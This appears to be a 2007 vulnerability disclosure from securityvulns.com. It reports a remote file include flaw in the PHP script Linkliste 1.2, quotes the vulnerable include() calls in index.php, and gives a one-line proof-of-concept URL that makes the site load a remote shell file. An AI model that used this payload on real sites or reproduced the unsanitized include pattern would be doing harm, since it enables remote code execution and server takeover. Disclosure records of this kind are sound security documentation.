0day Linkliste Version 1.2 Remote File Include by iNs

2007-08-13T00:00:00
ID SECURITYVULNS:DOC:17752
Type securityvulns
Reporter Securityvulns
Modified 2007-08-13T00:00:00

Description

Hi ,founded a new bug on this script ,I wanted to ask you if you could post it in securityvulns.com (thanks in advance .. iNs) Here what should be posted :

App Name : Linkliste Version 1.2 HomePage : http://www.mapos-scripts.de/downloads.php?download=3 Vuln type : Remote File Include (RFI) Vuln Discovered by : iNs

Vuln Code: index.php

include($styl[top]);

also

include($url_eintrag);

also

include($styl[themen]);

Note: All this vars are not defined before ,so can be included a remote malicious code.

POC: htttp://site.com/[path]/index.php?styl[top]=SHELL.txt??

iNs @ uNkn0wn.eu

Gr33tz t0: uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos - sh4m4n - Svarshik DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy ActiveSpy - r100z - The_PitBull

.: uNkn0wn.eu CreW :.